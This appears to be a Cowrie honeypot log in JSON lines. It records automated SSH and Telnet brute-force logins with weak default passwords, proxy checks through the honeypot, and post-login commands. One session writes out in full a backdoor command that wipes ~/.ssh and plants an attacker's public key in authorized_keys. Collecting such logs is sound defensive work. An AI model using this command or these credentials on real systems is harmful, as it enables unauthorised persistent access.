{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-31T07:57:56.214464Z","src_ip":"185.246.128.133","session":"b3843b3dfd8c"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:57:57.107372Z","src_ip":"185.246.128.133","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":24727,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:24727","sensor":"my-vps","timestamp":"2025-08-31T07:57:57.153032Z","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:57:57.197720Z","src_ip":"185.246.128.133","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":14847,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:14847","sensor":"my-vps","timestamp":"2025-08-31T07:57:57.330988Z","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:57:57.375587Z","src_ip":"185.246.128.133","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"185.246.128.133","src_port":24108,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24108","sensor":"my-vps","timestamp":"2025-08-31T07:57:57.506831Z","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:57:57.551422Z","src_ip":"185.246.128.133","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"185.246.128.133","src_port":15872,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:15872","sensor":"my-vps","timestamp":"2025-08-31T07:57:57.682971Z","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:57:57.727494Z","src_ip":"185.246.128.133","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"185.246.128.133","src_port":6958,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:6958","sensor":"my-vps","timestamp":"2025-08-31T07:57:57.858964Z","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:57:57.903625Z","src_ip":"185.246.128.133","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"185.246.128.133","src_port":31979,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:31979","sensor":"my-vps","timestamp":"2025-08-31T07:57:58.035054Z","session":"b3843b3dfd8c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:57:58.080201Z","src_ip":"185.246.128.133","session":"b3843b3dfd8c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:57:58.125564Z","src_ip":"185.246.128.133","session":"b3843b3dfd8c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62338,"dst_ip":"1.2.3.4","dst_port":22,"session":"c763b638d099","protocol":"ssh","message":"New connection: 217.72.205.35:62338 (1.2.3.4:22) [session: c763b638d099]","sensor":"my-vps","timestamp":"2025-08-31T07:57:58.355663Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:57:58.356783Z","src_ip":"217.72.205.35","session":"c763b638d099"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43910,"dst_ip":"1.2.3.4","dst_port":23,"session":"d63b06108ed3","protocol":"telnet","message":"New connection: 212.227.125.160:43910 (1.2.3.4:23) [session: d63b06108ed3]","sensor":"my-vps","timestamp":"2025-08-31T07:58:59.360833Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:58:59.930826Z","src_ip":"212.227.125.160","session":"d63b06108ed3"}
{"eventid":"cowrie.session.closed","duration":2.816526412963867,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:02.177273Z","src_ip":"212.227.125.160","session":"d63b06108ed3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33866,"dst_ip":"1.2.3.4","dst_port":23,"session":"4a73f1baa987","protocol":"telnet","message":"New connection: 212.227.125.160:33866 (1.2.3.4:23) [session: 4a73f1baa987]","sensor":"my-vps","timestamp":"2025-08-31T07:59:02.381408Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46602,"dst_ip":"1.2.3.4","dst_port":22,"session":"3719a5aea8c5","protocol":"ssh","message":"New connection: 212.227.125.160:46602 (1.2.3.4:22) [session: 3719a5aea8c5]","sensor":"my-vps","timestamp":"2025-08-31T07:59:03.514505Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60908,"dst_ip":"1.2.3.4","dst_port":22,"session":"6adc53378b64","protocol":"ssh","message":"New connection: 212.227.235.229:60908 (1.2.3.4:22) [session: 6adc53378b64]","sensor":"my-vps","timestamp":"2025-08-31T07:59:04.294626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:59:04.300417Z","src_ip":"212.227.235.229","session":"6adc53378b64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:59:04.541656Z","src_ip":"212.227.235.229","session":"6adc53378b64"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:59:04.651587Z","src_ip":"212.227.125.160","session":"3719a5aea8c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:59:04.670017Z","src_ip":"212.227.125.160","session":"3719a5aea8c5"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"usertest","message":"login attempt [testuser/usertest] failed","sensor":"my-vps","timestamp":"2025-08-31T07:59:05.507213Z","src_ip":"212.227.235.229","session":"6adc53378b64"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:06.748630Z","src_ip":"212.227.235.229","session":"6adc53378b64"}
{"eventid":"cowrie.session.closed","duration":5.233532190322876,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:07.614867Z","src_ip":"212.227.125.160","session":"4a73f1baa987"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33870,"dst_ip":"1.2.3.4","dst_port":23,"session":"99b37d0e5fa3","protocol":"telnet","message":"New connection: 212.227.125.160:33870 (1.2.3.4:23) [session: 99b37d0e5fa3]","sensor":"my-vps","timestamp":"2025-08-31T07:59:07.795596Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:59:08.388289Z","src_ip":"212.227.125.160","session":"99b37d0e5fa3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:59:08.409871Z","src_ip":"212.227.125.160","session":"99b37d0e5fa3"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T07:59:08.659289Z","src_ip":"212.227.125.160","session":"99b37d0e5fa3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:09.668379Z","src_ip":"212.227.125.160","session":"99b37d0e5fa3"}
{"eventid":"cowrie.session.closed","duration":1.878312110900879,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:09.673847Z","src_ip":"212.227.125.160","session":"99b37d0e5fa3"}
{"eventid":"cowrie.login.success","username":"root","password":"topsat2021","message":"login attempt [root/topsat2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:59:10.186974Z","src_ip":"212.227.125.160","session":"3719a5aea8c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48280,"dst_ip":"1.2.3.4","dst_port":22,"session":"9078bce5e6b9","protocol":"ssh","message":"New connection: 212.227.235.229:48280 (1.2.3.4:22) [session: 9078bce5e6b9]","sensor":"my-vps","timestamp":"2025-08-31T07:59:11.146645Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:59:12.980135Z","src_ip":"212.227.125.160","session":"3719a5aea8c5"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T07:59:12.980817Z","src_ip":"212.227.125.160","session":"3719a5aea8c5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:59:13.395836Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:59:13.564646Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:14.346998Z","src_ip":"212.227.125.160","session":"3719a5aea8c5"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:14.348197Z","src_ip":"212.227.125.160","session":"3719a5aea8c5"}
{"eventid":"cowrie.login.success","username":"root","password":"Root@2023","message":"login attempt [root/Root@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:59:18.737757Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:59:19.913384Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T07:59:19.914053Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T07:59:19.914875Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:20.473632Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:59:21.622860Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T07:59:21.623639Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T07:59:22.406888Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:22.408220Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":51396,"dst_ip":"1.2.3.4","dst_port":22,"session":"c363c1bb5162","protocol":"ssh","message":"New connection: 201.148.180.50:51396 (1.2.3.4:22) [session: c363c1bb5162]","sensor":"my-vps","timestamp":"2025-08-31T07:59:23.354999Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52635,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cccc8841a07","protocol":"ssh","message":"New connection: 212.227.235.229:52635 (1.2.3.4:22) [session: 6cccc8841a07]","sensor":"my-vps","timestamp":"2025-08-31T07:59:23.971720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:59:23.981493Z","src_ip":"212.227.235.229","session":"6cccc8841a07"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:59:24.162329Z","src_ip":"201.148.180.50","session":"c363c1bb5162"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:59:24.163018Z","src_ip":"201.148.180.50","session":"c363c1bb5162"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:59:24.173027Z","src_ip":"212.227.235.229","session":"6cccc8841a07"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T07:59:31.721940Z","src_ip":"212.227.235.229","session":"6cccc8841a07"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:32.893460Z","src_ip":"212.227.235.229","session":"6cccc8841a07"}
